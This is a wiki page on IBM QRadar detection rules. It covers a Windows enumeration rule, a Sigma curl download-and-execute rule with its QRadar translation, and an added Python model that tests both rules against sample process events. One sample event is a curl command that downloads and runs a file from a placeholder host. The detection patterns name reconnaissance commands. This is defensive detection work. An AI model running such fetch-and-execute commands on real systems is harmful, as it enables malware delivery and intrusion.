IBM QRadar: Rules: Difference between revisions

Revision as of 19:00, 19 January 2025

A Rule is a group of tests that can trigger an action if specific conditions are met.


Articles

Examples

Rule Description

Apply Potential Windows Enumeration Detected
and when an event matches any of the following BB: Windows Endpoint Events
and when the event matches Event ID is any of 4688
and when the event matches Command (custom) any of [whoami or tasklist or systeminfo]
and NOT when the source IP is one of the following IP addresses

Commands that attackers use to gather information on MS Windows servers

Example: (GitHub) Sigma - Curl Download And Execute Combination

selection:
  CommandLine|contains|windash: ' -c '
  CommandLine|contains|all:
    - 'curl '
    - 'http'
    - '-o'
    - '&'
condition: selection

And as an IBM QRadar rule:

Apply Potential Windows Enumeration Detected
and when an event matches any of the following BB: Windows Endpoint Events
and when the event matches Event ID is any of 4688
and when the event matches Command (custom) any of [/c or curl or http or -o or &]
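The following Python is an added example, not part of the wiki page and not QRadar or Sigma code: it models both rules described above (the Windows enumeration rule with its source-IP exclusion, and the Sigma curl download-and-execute selection with its windash modifier) and runs them over a handful of constructed Event ID 4688 records. The field names, the allowlisted address, and the sample command lines are assumptions made for the example.

```python
import itertools

# Constructed sample Windows process-creation (Event ID 4688) events, shaped
# the way a parser would hand them to a rule engine; not taken from the page.
SAMPLE_EVENTS = [
    {"event_id": 4688, "source_ip": "10.0.0.5",
     "command": r"C:\Windows\System32\whoami.exe /all"},
    {"event_id": 4688, "source_ip": "10.0.0.5",
     "command": "cmd.exe /c curl http://files.invalid/a.exe -o a.exe & a.exe"},
    {"event_id": 4688, "source_ip": "10.0.0.9",
     "command": "curl -o out.txt http://intranet.invalid/x & echo done"},
    {"event_id": 4688, "source_ip": "10.0.0.42", "command": "tasklist /v"},
    {"event_id": 4624, "source_ip": "10.0.0.5", "command": "whoami"},
    {"event_id": 4688, "source_ip": "10.0.0.5", "command": "notepad.exe"},
]

# Hypothetical allowlist standing in for the rule's
# "NOT when the source IP is one of the following IP addresses" test.
ALLOWLISTED_SOURCES = {"10.0.0.42"}

# The command names the enumeration rule on the page looks for.
ENUMERATION_COMMANDS = ["whoami", "tasklist", "systeminfo"]


def windash_variants(value):
    """Expand a Sigma `windash` value: each '-' or '/' may be either character."""
    positions = [i for i, ch in enumerate(value) if ch in "-/"]
    variants = set()
    for combo in itertools.product("-/", repeat=len(positions)):
        chars = list(value)
        for pos, repl in zip(positions, combo):
            chars[pos] = repl
        variants.add("".join(chars))
    return variants


def contains_any(haystack, needles):
    """'any of' semantics: case-insensitive substring match on at least one value."""
    h = haystack.lower()
    return any(n.lower() in h for n in needles)


def contains_all(haystack, needles):
    """Sigma `contains|all` semantics: every value must appear, case-insensitively."""
    h = haystack.lower()
    return all(n.lower() in h for n in needles)


def windows_enumeration(event, allowlist=ALLOWLISTED_SOURCES):
    """'Potential Windows Enumeration Detected' as described on the page."""
    return (event["event_id"] == 4688
            and contains_any(event["command"], ENUMERATION_COMMANDS)
            and event["source_ip"] not in allowlist)


def curl_download_execute(event):
    """Selection logic of the Sigma 'Curl Download And Execute Combination' rule."""
    cmd = event["command"]
    return (event["event_id"] == 4688
            and contains_any(cmd, windash_variants(" -c "))
            and contains_all(cmd, ["curl ", "http", "-o", "&"]))


RULES = [
    ("Potential Windows Enumeration Detected", windows_enumeration),
    ("Curl Download And Execute Combination", curl_download_execute),
]


def evaluate(events=SAMPLE_EVENTS):
    """Return (event index, rule name) for every rule that fires on each event."""
    hits = []
    for idx, event in enumerate(events):
        for name, rule in RULES:
            if rule(event):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in evaluate():
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['command']}")
```

Two details are worth checking when porting a Sigma rule into QRadar this way: the `windash` modifier means `' -c '` also matches `' /c '`, which is why the QRadar version lists `/c` explicitly, and `contains|all` requires every listed substring to be present, whereas a QRadar test written as "any of" fires as soon as one of them appears, so the two rules do not have identical coverage unless the QRadar tests are combined with AND.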

See also